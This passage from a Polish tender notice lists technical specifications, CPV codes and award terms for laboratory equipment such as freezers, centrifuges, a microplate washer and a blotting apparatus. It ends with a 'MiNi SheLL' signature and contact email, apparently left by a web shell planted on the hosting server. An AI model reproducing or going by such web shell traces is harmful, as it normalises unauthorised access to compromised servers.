2	Napęd mieszadła z wykorzystaniem cewki toroidalnej, bez żadnych ruchomych części
3	Zmiana kierunku mieszania co 30 sek. ?5 sek
4	Umożliwiające mieszanie cieczy (H2O) do min. 800 ml
5	Moc znamionowa silnika wejście/wyjście: 5/3 W
6	Zakres prędkości: 15 do 1500 obr./min ? 10%
7	Maksymalne wymiary dipola magnetycznego (dł. x śred.): 30 8 mm
8	Powierzchnia użytkowa płyty wierzchniej: 90 mm ? 5mm
9	Materiał płyty: Poliester
10	Wymiary (szer. x gł. x wys.): 114 x161x12mm ?5%
11	Ciężar max.: 0,3 kg
12	Klasa bezpieczeństwa obudowy zgodnie z DIN EN 60529: IP 65
13	Zasilanie: 100 - 240 V 50/60 Hz
14	Testowane zgodnie z normą: DIN EN IEC 61010-1
15	Gwarancja - min. 12 miesięcy
Wirówko-vortex - szt. 1
1	Mieszanie i odwirowanie próbek przy użyciu modułu wirowania i worteksowania
2	Stała prędkość wirowania: 2400 obr./min, RCF = 700g
3	W zestawie 2 rotory na probówki: 1,5 ml i 0,2 ml
4	Możliwość pracy ciągłej i impulsowej
5	Wymiary: 170 x 220 x 120mm ?10mm
6	Waga: max 1,8kg
7	Zasilanie 220V
8	Gwarancja - min. 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.65.00-5, 42.93.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Płuczka mikropłytek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płuczka mikropłytek - szt. 1
1	Głowica myjąca : 8-, 12 kanałowa
2	Dedykowana do płytek 96 dołkowych
3	Programowana za pomocą: kart lub własnej klawiatury
4	Zakres objętości płukania: 50-1000ul (krok programowania nie większy niż 50 ul)
5	Ilość cykli płukania od 1 do10
6	Pojemniki na płyn myjący oraz ścieki w zestawie
7	Dokładność dozowania +/- 5%
8	Możliwość użycia 2 różnych płynów płuczących
9	Gwarancja - min. 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zamrażarka niskotemperaturowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamrażarka niskotemperaturowa  szt. 1
1	Wykonanie skrzyniowe, pokrywa otwierana do góry
2	Zakres ustawianej temperatury do -86C
3	Pojemność co najmniej 310 ?5 litrów
4.	Maksymalne wymiary zewnętrzne:
Szerokość : 1860 mm 
Głębokość : 800 mm
Wysokość : 945 mm
5	Maksymalna waga urządzenia : 225 kg
6	Sterownik mikroprocesorowy z wyświetlaczem typu LED
7	Kaskadowy układ dwóch kompresorów
8	Izolacja wykonana z pianki poliuretanowej o grubości co najmniej 140 mm
9	Urządzenie wyposażone w alarmy wizualne i dźwiękowe:
- Zaniku napięcia
- zbyt wysokiej i zbyt niskiej temperatury
- informację o konieczności wyczyszczenia filtra
- konieczności wymiany zużytego komponentu
10	Urządzenie wykonane ze stali malowanej
11	Wnętrze wykonane ze stali nierdzewnej
12	
Rozwiązanie zapobiegające utracie ciepła przy otwieraniu drzwi za pomocą płyt oddzielających komorę wewnętrzną

13	Możliwość samopoziomowania

14	Poziom hałasu : max 49dB
15	Możliwość blokady klawiatury 
16	Wbudowany system diagnostyczny z wyświetlaniem kodów błędów 

17	Możliwość umieszczenia w urządzeniu około 190 szt. pudełek o wysokości 5cm.
18 	Możliwość wyposażenia urządzenia awaryjny  system CO2 backup z funkcją zliczania zużytego gazu w celu zagwarantowania informacji o niskim poziomie CO2 w butli 
19	Gwarancja - min. 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Suszarka laboratoryjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Suszarka laboratoryjna szt. 1
1	Pojemność co najmniej 90 litrów
2	Maksymalne wymiary zewnętrzne:
Szerokość : 580 mm
Głębokość : 595 mm
Wysokość : 820 mm
3	Maksymalna waga urządzenia : 50 kg
4.	Zakres ustawianej temperatury : od +40C do +200C
5	Sterownik mikroprocesorowy z wyświetlaczem typu LED
6	Urządzenie wyposażone w alarmy 
zbyt wysokiej i zbyt niskiej temperatury
Zabezpieczenie przed przegrzaniem
7	Powłoka zewnętrzna  wykonana ze stali galwanizowanej powlekanej akrylem 
8	Wnętrze wykonane ze stali nierdzewnej
9	Drzwi zewnętrzne z oknem o potrójnej warstwie szkła
10	Półki min. 2 szt.
11	Dwa kominki wentylacyjne umiejscowione na górnej ściance  urządzenia
12	Wymuszony obieg powietrza
13	Nastawianie temperatury co +/-1C
14	Wahania  temperatury +/- 4C przy temp. 200C
15	Możliwość blokady klawiatury za pomocą dwóch przycisków
16	Wbudowany system diagnostyczny z wyświetlaniem kodów błędów 

17	Gwarancja - min 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Miniwirówka, Termoblok, Vortex oraz Aparat do blootingu pół suchego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miniwirówka - szt. 1
1	Miniwirówka z wymiennymi rotorami oraz adapterami na 0.2, 0.4, 0.5, 1.5, 2 ml. 

2	Wykonana ze stali nierdzewnej zawiasy zapewniają łatwe otwieranie i zamykanie pokrywy.
3	Wirówka powinna posiadać możliwość uruchamiania poprzez zamykanie i otwieranie pokrywy w momencie, gdy główny włącznik jest w pozycji on.
4.	Skład zestawu:  rotor na probówki: 1,5/2 ml, na paski 8 x 0,2 ml oraz adapter na 0,4 i 0,5 ml.
5	Maksymalna prędkość : 6000 rpm
6	Maksymalna siła G : 2000 x g
7	Pojemność 6 x 1,5 -2 ml
2 paski 8 x 0,2 ml
8	Maksymalne wymiary zewnętrzne : 
Szerokość : 150mm
Głębokość : 150 mm
Wysokość : 117 mm 
9	Waga : 0,45 kg
10	Gwarancja - min 24 miesiące
Termoblok - szt. 1
1	 Przejrzysty wyświetlacz LCD - widoczny czas i temperatura jednocześnie

2	Sterowanie za pomocą mikroprocesora zapewnia stałe, powtarzalne parametry
3	Zakres temperatury 5-1500C

4	Regulacja temperatury co 0,10C
5	Dodatkowa funkcja łaźni wodnej
6	Komora na wkłady grzejne formowana ze stopu aluminium
7	Możliwość kalibracji temperatury przez użytkownika
8	Maksymalne wymiary zewnętrzne : 
Szerokość : 152mm
Głębokość : 150 mm
Wysokość : 135 mm
9	Waga max 3,5 kg
10	Termoblok zaopatrzony w dwustronny wkład na probówki, z jednej strony na 20 x 1.5/2.0ml, z drugiej na 30 x 0.5 ml, wykonany z aluminium
11	Gwarancja - min 24 miesiące
Vortex - szt. 1
1	Wybór prędkości za pomocą pokrętła.

2	Dostępne dwa tryby mieszania: pod naciskiem oraz tryb ruchu ciągłego.

3	Wyposażony w standardową, uniwersalną nakładkę
4	Opcjonalnie dostępne nakładki na płytki oraz szeroki zakres probówek: 0,5/1,5/2,0/15/50ml.

5	Bezpieczny - antypoślizgowe nakładki wykonane ze specjalnego tworzywa.

6	Zakres prędkości:200-3400 rpm (120V)/200-2850 rpm (230V)

7	Tryby operacyjne: ciągły i dotykowy

8	Maksymalne wymiary zewnętrzne : 
Szerokość : 140mm
Głębokość : 160 mm
Wysokość : 120 mm
9	Waga :2,2 kg
10	Gwarancja - min 24 miesiące
Aparat do blootingu pół suchego - szt. 1
1	Szybki transfer biomolekuł - 15-30 minut.

2	Idealny do wszystkich typów blottingu: western, southern i northern.

3	Platynowa anoda oraz katoda ze stali nierdzewnej 

4	Kompatybilny z żelami o grubości od 0,25 do 10 mm.

5	
Kontrolowane, równomierne rozłożenie nacisku na cały blot.

6	Jednolity rozkład temperatury zapewnia równy transfer.

7	Przezroczyste elementy pokrywy umożliwiające podgląd.

8	Maksymalne wymiary zewnętrzne : 
Szerokość : 260mm
Głębokość : 260 mm
Wysokość : 70 mm
9	Maksymalna pojemność : 
1 blot , 20 x 20 cm
4 bloty, 10 x 10 cm
10	Objętość buforu : 20 ml.
11	Gwarancja - min 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.93.11.00-2, 38.54.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com